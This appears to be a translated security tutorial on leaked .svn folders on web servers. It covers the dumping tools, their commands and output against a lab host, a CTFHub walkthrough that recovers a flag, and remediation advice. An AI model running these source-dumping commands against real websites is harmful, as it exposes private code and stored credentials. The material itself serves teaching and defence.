Vulnerability introduction
SVN is an open source version control system. When using SVN to manage local code, a hidden folder named .svn will be automatically generated, which contains important source code information. If the website administrator does not use it when publishing the code, Export function, but directly copy the code folder to the WEB server, which exposes the .svn hidden folder to the external network environment. You can use the .svn/entries file to obtain the server source code
Utilizing tools
Seay-SVN exploit tool
Utilizing tools
https://github.com/kost/dvcs-ripper
Install third-party dependencies:
sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl
sudo apt-get install libparallel-forkmanager-perl libredis-perl libalgorithm-combinatorics-perl
sudo apt-get install cvs subversion git bzr mercurial
Use script
svnExploit.py
https://github.com/admintony/svnExploit
Vulnerability detection:
python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/ ____ _____ _ _ _ / ___|_ ___ __ | ____|_ ___ __ | | ___ (_) |_ \___ \ \ / / '_ \| _| \ \/ / '_ \| |/ _ \| | __| ___) \ V /| | | |___ > <| |_) | | (_) | | |_ |____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__| |_| SvnExploit - Dump the source code by svn Author: AdminTony (http://admintony.com) https://github.com/admintony/svnExploit + -------------------- + ---------- + ------------------ ---------------------------------- + | File Name | File Type | CheckSum | + -------------------- + ---------- + ------------------ ---------------------------------- + | conn.php | file | $sha1$8f47ccbd4a436aa4f31018fea026275f6059ed10 | | trunk | dir | None | | branches | dir | None | | admin_login.php | file | $sha1$a6981b1ca963c8a75e133e38780be7ff0cd60952 | | phpmyadmin | file | $sha1$6d5af41c175e344ee483732648edc9318b2a6014 | | README.TXT | file | $sha1$c5981462cc06422f4a78e68f0a48dddcf5860eb9 | | README.txt | file | $sha1$ef4b5f3081dbac31f9fb089aafd60dd2b9474b51 | | secret.php | file | $sha1$2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609 | | README.md | file | $sha1$466f5ab1e4adfd373a23f639e0dd8fcfdce7874b | | img/login_bg01.jpg | file | $sha1$311efc58c4d7035a54fdb8e94d6ba901c56354fd | | img | dir | None | | index.php | file | $sha1$4660847a73ab0906d91841dde9576bd5054b2020 | | test.sql | file | $sha1$096a90da3e471a472874413b18cb2f5dd0567fd1 | | admin.php | file | $sha1$f444d3aad996577872ac7b95a2c05aa11e6b1f8f | | document | dir | None | | tags | dir | None | + -------------------- + ---------- + ------------------ ------------------------------- +
Get source code information
python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/ --dump ____ _____ _ _ _ / ___|_ ___ __ | ____|_ ___ __ | | ___ (_) |_ \___ \ \ / / '_ \| _| \ \/ / '_ \| |/ _ \| | __| ___) \ V /| | | |___ > <| |_) | | (_) | | |_ |____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__| |_| SvnExploit - Dump the source code by svn Author: AdminTony (http://admintony.com) https://github.com/admintony/svnExploit + -------------------------- + -------------------------- ---------------------------------------- + --------- - + | File name | URL | Download status | + -------------------------- + -------------------------- ---------------------------------------- + --------- - + | conn.php | .svn/pristine/8f/8f47ccbd4a436aa4f31018fea026275f6059ed10.svn-base | Download successful | | README.TXT | .svn/pristine/c5/c5981462cc06422f4a78e68f0a48dddcf5860eb9.svn-base | Download successful | | README.txt | .svn/pristine/ef/ef4b5f3081dbac31f9fb089aafd60dd2b9474b51.svn-base | Download successful | | phpmyadmin | .svn/pristine/6d/6d5af41c175e344ee483732648edc9318b2a6014.svn-base | Download successful | | secret.php | .svn/pristine/2e/2e6a7a6976d31847f0eebf7bbc252bcc1ff4f609.svn-base | Download successful | | README.md | .svn/pristine/46/466f5ab1e4adfd373a23f639e0dd8fcfdce7874b.svn-base | Download successful | | admin_login.php | .svn/pristine/a6/a6981b1ca963c8a75e133e38780be7ff0cd60952.svn-base | Download successful | | index.php | .svn/pristine/46/4660847a73ab0906d91841dde9576bd5054b2020.svn-base | Download successful | | admin.php | .svn/pristine/f4/f444d3aad996577872ac7b95a2c05aa11e6b1f8f.svn-base | Download successful | | test.sql | .svn/pristine/09/096a90da3e471a472874413b18cb2f5dd0567fd1.svn-base | Download successful | | img/login_bg01.jpg | .svn/pristine/31/311efc58c4d7035a54fdb8e94d6ba901c56354fd.svn-base | Download successful | + -------------------------- + -------------------------- ---------------------------------------- + --------- - + [ + ] Dump completed!
Simple case
Let’s take an svn information leakage problem from CTFHUB as an example to demonstrate:
Step 1: Visit the shooting range address and you will see the following prompt information
CTFHub environment instance | prompt information
Step 2: Use directory scanning to find that there is indeed svn information leakage
python3 dirsearch.py -u http://challenge-09e40d4fa439d842.sandbox.ctfhub.com:10800/ -e *
Step 3: Use the rip-svn.pl script in the dvcs-ripper tool to clone
./rip-svn.pl -u http://challenge-09e40d4fa439d842.sandbox.ctfhub.com:10800/.svn/
Find the file name of the flag file from wc.db, try to access it and find that it has been deleted.
cat wc.db | grep -a flag
Turn to the file in .svn/pristine/ and find flag–ctfhub{fc8dfadda86879a9956cde97}
Repair suggestions
Delete all .svn hidden folders in the web directory. When developers use SVN, they must strictly use the export function and prohibit direct copying of code.
- Review the code: The code needs to be reviewed regularly to ensure that no sensitive information has been leaked. You can use SVN’s search function to find sensitive information such as: passwords and credentials.
- Restrict access rights: Restrict access rights to the SVN server to ensure that only authorized users can access the SVN server. You can use the SVN access control function to limit user access rights.
- Enhance security measures: To prevent future breaches, security measures need to be enhanced. For example, restrict access to the SVN server, use multi-factor authentication, change passwords regularly, etc.
- Regularly back up data: The data of the SVN server needs to be backed up regularly to prevent data loss or damage. Backup data should be stored in a secure location and the recoverability of backup data should be tested regularly
- Encrypt sensitive information: SVN does not have an undo commit feature like Git, so other means need to be used to protect sensitive information. Sensitive information can be encrypted using encryption algorithms to protect it from direct reading.